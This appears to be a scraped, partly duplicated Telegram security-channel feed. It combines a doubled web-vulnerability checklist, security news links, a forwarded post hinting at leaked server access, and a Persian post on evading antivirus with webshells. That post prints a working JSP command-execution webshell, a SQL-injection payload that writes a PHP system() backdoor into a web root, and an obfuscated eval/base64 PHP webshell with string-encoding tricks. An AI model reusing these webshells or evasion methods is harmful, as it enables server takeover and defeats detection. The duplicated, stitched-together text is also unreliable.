Arbitary File Deletion
Code Execution
Cookie Manipulation ( meta http-equiv & crlf injection )
CRLF Injection ( HTTP response splitting )
Cross Frame Scripting ( XFS )
Cross-Site Scripting ( XSS )
Directory traversal
Email Injection
File inclusion
Full path disclosure
LDAP Injection
PHP code injection
PHP curl_exec() url is controlled by user
PHP invalid data type error message
PHP preg_replace used on user input
PHP unserialize() used on user input
Remote XSL inclusion
Script source code disclosure
Server-Side Includes (SSI) Injection
SQL injection
URL redirection
XPath Injection vulnerability
EXIF
Blind SQL injection (timing)
Blind SQL/XPath injection (many types)
8.3 DOS filename source code disclosure
Search for Backup files
Cross Site Scripting in URI
PHP super-globals-overwrite
Script errors such as the Microsoft IIS Cookie Variable Information Disclosure
Cross Site Scripting in path
Cross Site Scripting in Referer
Directory permissions ( mostly for IIS )
HTTP Verb Tampering ( HTTP Verb POST HTTP Verb WVS )
* Possible sensitive files
* Possible sensitive files
* Session fixation ( jsessionid PHPSESSID session fixation )
Vulnerabilities ( e.g. Apache Tomcat Directory Traversal, ASP.NET error message etc )
WebDAV ( very vulnerable component of IIS servers )
Application error message
Check for common files
Directory Listing
Email address found
Local path disclosure
Possible sensitive files
Microsoft Office possible sensitive information
Possible internal IP address disclosure
Possible server path disclosure ( Unix and Windows )
Possible username or password disclosure
Sensitive data not encrypted
Source code disclosure
Trojan shell ( r57,c99,crystal shell etc )
( IF ANY )Wordpress database credentials disclosure
Unrestricted File Upload
Microsoft IIS WebDAV Authentication Bypass
SQL injection in the authentication header
Weak Password
GHDB – Google hacking database ( using dorks to find what google crawlers have found like passwords etc )
Application Error Message ( testing with empty, NULL, negative, big hex etc )
Code Execution
SQL Injection
XPath Injection
Blind SQL/XPath injection ( test for numeric,string,number inputs etc )
Stored Cross-Site Scripting ( XSS )
Cross-Site Request Forgery ( CSRF
Code Execution
Cookie Manipulation ( meta http-equiv & crlf injection )
CRLF Injection ( HTTP response splitting )
Cross Frame Scripting ( XFS )
Cross-Site Scripting ( XSS )
Directory traversal
Email Injection
File inclusion
Full path disclosure
LDAP Injection
PHP code injection
PHP curl_exec() url is controlled by user
PHP invalid data type error message
PHP preg_replace used on user input
PHP unserialize() used on user input
Remote XSL inclusion
Script source code disclosure
Server-Side Includes (SSI) Injection
SQL injection
URL redirection
XPath Injection vulnerability
EXIF
Blind SQL injection (timing)
Blind SQL/XPath injection (many types)
8.3 DOS filename source code disclosure
Search for Backup files
Cross Site Scripting in URI
PHP super-globals-overwrite
Script errors such as the Microsoft IIS Cookie Variable Information Disclosure
Cross Site Scripting in path
Cross Site Scripting in Referer
Directory permissions ( mostly for IIS )
HTTP Verb Tampering ( HTTP Verb POST HTTP Verb WVS )
* Possible sensitive files
* Possible sensitive files
* Session fixation ( jsessionid PHPSESSID session fixation )
Vulnerabilities ( e.g. Apache Tomcat Directory Traversal, ASP.NET error message etc )
WebDAV ( very vulnerable component of IIS servers )
Application error message
Check for common files
Directory Listing
Email address found
Local path disclosure
Possible sensitive files
Microsoft Office possible sensitive information
Possible internal IP address disclosure
Possible server path disclosure ( Unix and Windows )
Possible username or password disclosure
Sensitive data not encrypted
Source code disclosure
Trojan shell ( r57,c99,crystal shell etc )
( IF ANY )Wordpress database credentials disclosure
Unrestricted File Upload
Microsoft IIS WebDAV Authentication Bypass
SQL injection in the authentication header
Weak Password
GHDB – Google hacking database ( using dorks to find what google crawlers have found like passwords etc )
Application Error Message ( testing with empty, NULL, negative, big hex etc )
Code Execution
SQL Injection
XPath Injection
Blind SQL/XPath injection ( test for numeric,string,number inputs etc )
Stored Cross-Site Scripting ( XSS )
Cross-Site Request Forgery ( CSRF
#Tor blocked in Turkey as government cracks down on VPN use
https://turkeyblocks.org/2016/12/18/tor-blocked-in-turkey-vpn-ban/
https://turkeyblocks.org/2016/12/18/tor-blocked-in-turkey-vpn-ban/
Turkey Blocks
Tor blocked in Turkey as government cracks down on VPN use - Turkey Blocks
The Turkey Blocks internet censorship watchdog has identified and verified that restrictions on the Tor anonymity network and Tor Browser are now in effect throughout Turkey. Our study indicates that service providers have successfully complied with a government…
iOS 10.1.1 Kernel & Root Exploit by Project Zero Team RELEASED !
https://m.reddit.com/r/jailbreak/comments/5iiyo1/discussion_ios_1011_kernel_root_exploit_by/
https://youtu.be/MeqbzfKi7WY
https://m.reddit.com/r/jailbreak/comments/5iiyo1/discussion_ios_1011_kernel_root_exploit_by/
https://youtu.be/MeqbzfKi7WY
YouTube
Ian Beer's iOS 10.1.1 Exploit Demo and Detection
Last week, Ian Beer, from the Google Project Zero research team, released his local elevation of privileges exploit targeting iOS 10.1.1. We took it upon our...
Forwarded from Israel_zurael_sTz
download.freeleecher.ir:555
user : https://ghostbin.com/paste/krbqh
5 ports http://pastebin.com/kVLxN7HU
@HackRead #Oplslam #Opiran #iran #freeleecher
user : https://ghostbin.com/paste/krbqh
5 ports http://pastebin.com/kVLxN7HU
@HackRead #Oplslam #Opiran #iran #freeleecher
Pastebin
download.freeleecher.ir:555 | user... | #ICA - Pastebin.com
Forwarded from ناویا، ماشین کاوش اپلای
وبشلها ابزار مدیریت و Post Exploitation مهاجمین تحت وب است. آنها میتوانند با وبشل بسیار سریعتر و بهینهتر به اجزای سرورها دسترسی داشته و عملیات خود را انجام دهند.
همانطور که میدانید وبشلها تغییر چندانی در ماهیت خود از چند سال پیش نداشتهاند، اما به مرور سیاستهای جلوگیری از تشخیص در آنها بهکار گرفته شده است.
۱. استفاده از فناوری JSP در کنار استفاده از فناوریهای Web2:
که هماکنون نیز مشاهده میکنید (goo.gl/PE6ZC0) میزان شناخت این وبشل توسط ضدویروسها ۲ از ۵۴ بوده است.
۲. استفاده از توابع خطرناک در میانهی کدها و عملیات روتین تحت وب:
که بدیهی است یک دستور SQL به جهت جا انداختن یک پشتدری (Backdoor) درون یک فایل میباشد. البته برای این مورد مهاجم باید یک آسیبپذیری SQL Injection یافت کند.
میزان شناخت این مورد توسط ضدویروسها، صفر از ۵۴ بوده است!
۳. یکی از مزایای مبهمسازی (Obfuscation) کدها برای حملات تحت وب، استفاده از الگوریتمها و ترکیبات ناشناختهی آن جهت مقابله با IDS/IPS ها، ضدویروسها، Firewallها و دیگر ابزارهای شناخت وبشل است. در این مورد قصد داریم یک الگوریتم ترکیبی را به شما نمایش دهیم تا درک کنید چقدر دورزدن ضدویروسها میتواند آسان باشد:
این قسمتی از یک وبشل مبهمسازیشده توسط ابزار رایگان و آنلاین FOPO میباشد که میزان شناخت آن توسط ضدویرسها صفر از ۵۴ بوده است! (goo.gl/9JznXu)
ممکن است در نگاه اول کمی عجیب بوده باشد اما محتوای شفاف آن به شکل زیر است:
تنها تفاوت آن با دیگر ابزارهای مبهمسازی این است که رشتهی “base64_decode” را چطور رمزگذاری (Encode) میکند.
نمونههایی از آن به این صورت است:
توجه میکنید که هر کدام از مقادیر یک ترکیب متفاوت از مقادیر Hex و Octal دیگری است! به همین سادگی.
در پستهای آینده انشاالله با روشهای شناخت و جلوگیری بهینه و مدرن این سری از عملیات آشنا خواهید شد.
گروه پژوهشی آفسک
@offsecmag
همانطور که میدانید وبشلها تغییر چندانی در ماهیت خود از چند سال پیش نداشتهاند، اما به مرور سیاستهای جلوگیری از تشخیص در آنها بهکار گرفته شده است.
۱. استفاده از فناوری JSP در کنار استفاده از فناوریهای Web2:
<%@ page import="java.util.*,java.io.*"%>
<html>
<body>
<form method="GET" name="offsec.ir" action="">
<input type="text" name="cmd">
<input type="submit" value="Send">
</form>
<pre>
<%
if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<br>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null )
{out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</body>
</html>
که هماکنون نیز مشاهده میکنید (goo.gl/PE6ZC0) میزان شناخت این وبشل توسط ضدویروسها ۲ از ۵۴ بوده است.
۲. استفاده از توابع خطرناک در میانهی کدها و عملیات روتین تحت وب:
UNION SELECT NULL,"<? system($_REQUEST['cmd']); ?>", NULL INTO OUTFILE "/var/www/offsec.ir/webshell.php" —
که بدیهی است یک دستور SQL به جهت جا انداختن یک پشتدری (Backdoor) درون یک فایل میباشد. البته برای این مورد مهاجم باید یک آسیبپذیری SQL Injection یافت کند.
میزان شناخت این مورد توسط ضدویروسها، صفر از ۵۴ بوده است!
۳. یکی از مزایای مبهمسازی (Obfuscation) کدها برای حملات تحت وب، استفاده از الگوریتمها و ترکیبات ناشناختهی آن جهت مقابله با IDS/IPS ها، ضدویروسها، Firewallها و دیگر ابزارهای شناخت وبشل است. در این مورد قصد داریم یک الگوریتم ترکیبی را به شما نمایش دهیم تا درک کنید چقدر دورزدن ضدویروسها میتواند آسان باشد:
<?php
/*
@offscmag – offsec.ir
Obfuscation provided by FOPO - Free Online PHP Obfuscator
Checksum: e5a931bb23bbcc2dbf286decc8e2b2b72a7d9b0b
*/ $g2a594c0="\x62\x61\163\145\66\64\137\144\145\143\157\144\145";@eval($g2a594c0( "Ly9Oc044UThBMCtXVVJ6NytPQ2VkU0lGeFczNEwrR1NZVlJnZHN5M1pKK01mSXRJUkRYeU1OOGR2RX
این قسمتی از یک وبشل مبهمسازیشده توسط ابزار رایگان و آنلاین FOPO میباشد که میزان شناخت آن توسط ضدویرسها صفر از ۵۴ بوده است! (goo.gl/9JznXu)
ممکن است در نگاه اول کمی عجیب بوده باشد اما محتوای شفاف آن به شکل زیر است:
$g2a594c0=”base64_decode”;
@eval($g2a594c0(“…”);
تنها تفاوت آن با دیگر ابزارهای مبهمسازی این است که رشتهی “base64_decode” را چطور رمزگذاری (Encode) میکند.
نمونههایی از آن به این صورت است:
$ueafa759="\x62\141\163\x65\66\64\x5f\x64\x65\143\x6f\x64\145";
$c03a9f9c="\142\141\163\145\x36\64\x5f\x64\x65\x63\157\x64\x65";
$p44aaf5f="\x62\141\163\145\66\64\x5f\x64\145\143\x6f\x64\x65";
توجه میکنید که هر کدام از مقادیر یک ترکیب متفاوت از مقادیر Hex و Octal دیگری است! به همین سادگی.
در پستهای آینده انشاالله با روشهای شناخت و جلوگیری بهینه و مدرن این سری از عملیات آشنا خواهید شد.
گروه پژوهشی آفسک
@offsecmag
BARF : Binary Analysis and Reverse engineering Framework
https://github.com/programa-stic/barf-project
https://github.com/programa-stic/barf-project
GitHub
GitHub - programa-stic/barf-project: BARF : A multiplatform open source Binary Analysis and Reverse engineering Framework
BARF : A multiplatform open source Binary Analysis and Reverse engineering Framework - programa-stic/barf-project
Critical Flaw in PHPMailer, popular email sending PHP library, leaves Millions of Sites Vulnerable to Remote Exploit
http://thehackernews.com/2016/12/phpmailer-security.html
http://thehackernews.com/2016/12/phpmailer-security.html
https://media.ccc.de/v/33c3-7949-wheel_of_fortune
ارائه علی عباسی در کنفرانس CCC در رابطه با ضعف امنیتی سیستمهای تعبیه شده در تولید اعداد تصادفی .
ارائه علی عباسی در کنفرانس CCC در رابطه با ضعف امنیتی سیستمهای تعبیه شده در تولید اعداد تصادفی .
media.ccc.de
Wheel of Fortune
Secure random number generators play a crucial role in the wider security ecosystem. In the absence of a dedicated hardware True Random N...